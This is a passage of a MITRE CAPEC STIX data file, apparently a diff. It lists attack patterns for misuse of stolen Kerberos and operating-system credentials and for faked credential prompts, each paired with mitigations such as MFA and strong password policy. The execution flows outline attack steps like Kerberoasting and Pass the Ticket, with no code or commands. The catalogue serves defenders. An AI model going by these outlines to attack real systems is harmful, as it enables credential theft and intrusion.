"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, physically disable the microphone on your machine if it is not needed.", + "id": "course-of-action--69dcf49f-4e67-4936-8ee7-6328a342fcf3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9fead0ee-041f-4282-bc32-392a7b3aed13", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69dcf49f-4e67-4936-8ee7-6328a342fcf3", + "spec_version": "2.1", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.", + "external_references": [ + { + "external_id": "CAPEC-652", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/652.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "description": "Steal or Forge Kerberos Tickets", + "external_id": "T1558", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1558" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + }, + { + "description": "Kerberoasting Without Mimikatz, 2016--11---01", + "external_id": "REF-585", + "source_name": "reference_from_CAPEC", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "description": "Invoke-Kerberoast", + "external_id": "REF-586", + "source_name": "reference_from_CAPEC", + "url": "https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + } + ], + "id": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Kerberos Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]", + "PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Kerberos credentials: The adversary must obtain known Kerberos credentials in order to access the target system, application, or service within the domain.

    2. Techniques
    An adversary purchases breached Kerberos service account username/password combinations or leaked hashed passwords from the dark web.
    An adversary guesses the credentials to a weak Kerberos service account.
    An adversary conducts a sniffing attack to steal Kerberos tickets as they are transmitted.
    An adversary conducts a Kerberoasting attack.

Experiment

  1. Attempt Kerberos authentication: Try each Kerberos credential against various resources within the domain until the target grants access.

    2. Techniques
    Manually or automatically enter each Kerberos service account credential through the target's interface.
    Attempt a Pass the Ticket attack.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n Kerberos is the default authentication method for Windows domains and is also used across many operating systems. Attacks leveraging trusted Kerberos credentials can result in numerous consequences, depending on what Kerberos credential is stolen. For example, Kerberos service accounts are typically used to run services or scheduled tasks pertaining to authentication. However, these credentials are often weak and never expire, in addition to possessing local or domain administrator privileges. If an adversary is able to acquire these credentials, it could result in lateral movement within the domain or access to any resources the service account is privileged to access, among other things. Ultimately, successful spoofing and impersonation of trusted Kerberos credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f" + ], + "x_capec_prerequisites": [ + "The system/application leverages Kerberos authentication.", + "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication for Kerberos service accounts.", + "The system/application does not have a sound password policy that is being enforced for Kerberos service accounts.", + "The system/application does not implement an effective password throttling mechanism for authenticating to Kerberos service accounts.", + "The targeted network allows for network sniffing attacks to succeed." + ], + "x_capec_resources_required": [ + "A valid Kerberos ticket or a known Kerberos service account credential." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Kerberos credential, leveraging it is trivial." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Create a strong password policy and ensure that your system enforces this policy for Kerberos service accounts.", + "id": "course-of-action--2e1a5831-7cf6-44e4-93ce-a94cbf2d8eeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f1be939-d853-4d8a-95f3-0b617e01e652", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e1a5831-7cf6-44e4-93ce-a94cbf2d8eeb", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure Kerberos service accounts are not reusing username/password combinations for multiple systems, applications, or services.", + "id": "course-of-action--9ee558c8-a72f-4895-8174-1bade0ff03ec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a90ffcb8-0f80-4e85-8b26-10496f6bb52a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ee558c8-a72f-4895-8174-1bade0ff03ec", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse Kerberos service account credentials across systems.", + "id": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--785c37de-0ec5-4060-874b-ee39ba235750", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deny remote use of Kerberos service account credentials to log into domain systems.", + "id": "course-of-action--91219be7-37d8-46e3-935e-5f41a4522558", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d34114ce-f6a3-4ab9-ba44-4d82771bf60f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91219be7-37d8-46e3-935e-5f41a4522558", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow Kerberos service accounts to be a local administrator on more than one system.", + "id": "course-of-action--6c5c6b07-f048-4361-81c5-74776f2b1677", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4ad929d-f0f1-40d2-b370-48856e8046d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c5c6b07-f048-4361-81c5-74776f2b1677", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enable at least AES Kerberos encryption for tickets.", + "id": "course-of-action--dd7827a3-05d8-4f6b-a821-c18bae857754", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8864ef8-634a-4587-9b9f-7dffc85bb827", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd7827a3-05d8-4f6b-a821-c18bae857754", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6950a75-d731-468c-a735-bd8659dd2c6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.", + "external_references": [ + { + "external_id": "CAPEC-653", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/653.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Jeff Warren, How Attackers are Stealing Your Credentials with Mimikatz, 2017--07---11, STEALTHbits Technologies, Inc.", + "external_id": "REF-576", + "source_name": "reference_from_CAPEC", + "url": "https://blog.stealthbits.com/how-attackers-are-stealing-your-credentials-with-mimikatz/" + } + ], + "id": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Operating System Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. [REF-576]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known operating system credentials: The adversary must obtain known operating system credentials in order to access the target system, application, or service within the domain.

    2. Techniques
    An adversary purchases breached operating system username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal operating system credentials as they are transmitted.
    An adversary gains access to a system/files and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

Experiment

  1. Attempt authentication: Try each operating system credential against various systems, applications, and services within the domain until the target grants access.

    2. Techniques
    Manually or automatically enter each credential through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the network

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the network. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within system files or application configuration.

", + "x_capec_extended_description": "\n This attack can be extremely harmful when the operating system credentials used are for a root or admin user. Once an adversary gains access using credentials with elevated privileges, they are free to alter important system files which can effect other users who may use the system or other users on the system's network.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_prerequisites": [ + "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A list of known credentials for the targeted domain.", + "A custom script that leverages a credential list to launch an attack." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known credential, leveraging it is trivial." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the network.", + "id": "course-of-action--b1c371ce-f966-4db4-8193-eb03cd1d8190", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-653-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d717559-5a7c-4abe-994a-f5ed56626c2b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b1c371ce-f966-4db4-8193-eb03cd1d8190", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--30fc8e66-ac77-4700-963e-64a29973924f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a406676c-8452-46d2-a72c-11463c53b3cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32a275d9-4766-40b2-ae6b-7307d384bf7b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f52fb187-a070-476a-914d-5c9f061558d1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c81c0b14-89ac-4328-87fc-e5471e7edfc7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--37212961-3d05-427a-ada9-72ac4ca5adca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates a credential prompt in an attempt to steal a user's credentials.", + "external_references": [ + { + "external_id": "CAPEC-654", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Input Capture", + "external_id": "T1056", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056" + }, + { + "description": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt", + "external_id": "T1548.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548/004" + } + ], + "id": "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Prompt Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1995c522-a25d-46e4-b024-65172771a692" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary randomly prompts a user to enter their system credentials, tricking the user into believing that a background process requires the credentials to function. The adversary can then use these gleaned credentials to execute additional attacks or obtain data." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing their credentials.

    2. Techniques
    Determine what tasks prompt a user for their credentials.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials.

    2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
", + "x_capec_extended_description": "\n The adversary may monitor the task list maintained by the operating system and wait for a specific legitimate credential prompt to become active. Once the prompt is detected, the adversary launches a new credential prompt in the foreground that mimics the user interface of the legitimate credential prompt. At this point, the user thinks that they are interacting with the legitimate credential prompt, but instead they are interacting with the malicious credential prompt.\n A second approach involves the adversary impersonating an unexpected credential prompt, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process or commonly used application (e.g., email reader) requires authentication for some purpose. The user, believing they are interacting with a legitimate credential prompt, enters their credentials which the adversary then leverages for nefarious purposes. The ultimate goal of this attack is to obtain sensitive information (e.g., credentials) from the user.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate credential prompt." + ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a credential prompt is not difficult." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--941eef6d-7520-4cb3-97db-3e53b6e58b9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "spec_version": "2.1", + "target_ref": 